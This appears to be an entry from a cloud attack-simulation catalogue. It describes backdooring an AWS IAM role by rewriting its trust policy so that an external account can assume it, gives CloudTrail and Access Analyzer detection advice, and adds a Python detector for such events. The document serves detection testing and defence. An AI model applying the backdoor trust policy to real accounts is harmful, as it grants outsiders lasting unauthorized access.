Backdoor an IAM Role
idempotent
Platform: AWS
MITRE ATT&CK Tactics
- Persistence
Description
Establishes persistence by backdooring an existing IAM role, allowing it to be assumed from an external AWS account.
Warm-up:
- Create an IAM role.
Detonation:
- Update the assume role policy of the IAM role to backdoor it, making it accessible from an external, fictitious AWS account:
  {
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Allow",
        "Principal": {
          "Service": "ec2.amazonaws.com"
        },
        "Action": "sts:AssumeRole"
      },
      {
        "Effect": "Allow",
        "Principal": {
          "AWS": "arn:aws:iam::193672423079:root"
        },
        "Action": "sts:AssumeRole"
      }
    ]
  }
Instructions
Detection
- Using CloudTrail's UpdateAssumeRolePolicy event.
- Through IAM Access Analyzer, which generates a finding when a role can be assumed from a new AWS account or publicly.
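The CloudTrail-based detection above, worked through as an added example (not code from the original page): it parses the trust policy carried in an UpdateAssumeRolePolicy record and returns any AssumeRole principal that is outside a set of trusted accounts. The record shape (requestParameters.policyDocument as a JSON string), the victim account ID and the role name are constructed assumptions; the external account ID 193672423079 is the fictitious one used in the detonation.

```python
import json

# Constructed CloudTrail record (abridged). The trust policy is the one from the
# detonation, delivered as a JSON string in requestParameters.policyDocument.
SAMPLE_EVENT = {
    "eventName": "UpdateAssumeRolePolicy",
    "recipientAccountId": "111111111111",  # constructed: the victim account
    "requestParameters": {
        "roleName": "example-backdoored-role",  # constructed name
        "policyDocument": json.dumps({
            "Version": "2012-10-17",
            "Statement": [
                {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"},
                 "Action": "sts:AssumeRole"},
                {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::193672423079:root"},
                 "Action": "sts:AssumeRole"},
            ],
        }),
    },
}

# Actions that grant role assumption, compared case-insensitively.
ASSUME_ACTIONS = {"sts:assumerole", "sts:*", "*"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _account_of(principal):
    """Account ID an AWS principal belongs to ('*' for a wildcard principal)."""
    if principal == "*":
        return "*"
    parts = principal.split(":")
    return parts[4] if len(parts) >= 5 else principal  # ARN, or a bare account ID


def external_trust_principals(event, trusted_accounts):
    """Principals in the new trust policy that lie outside trusted_accounts."""
    if event.get("eventName") != "UpdateAssumeRolePolicy":
        return []
    policy = json.loads(event["requestParameters"]["policyDocument"])
    found = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if not actions & ASSUME_ACTIONS:
            continue
        principal = stmt.get("Principal", {})
        aws = ["*"] if principal == "*" else _as_list(principal.get("AWS", []))
        found += [p for p in aws if _account_of(p) not in trusted_accounts]
    return found
```

A non-empty result for a role in a production account is the alert condition; service principals (the ec2.amazonaws.com statement) are deliberately ignored because they are not cross-account trust.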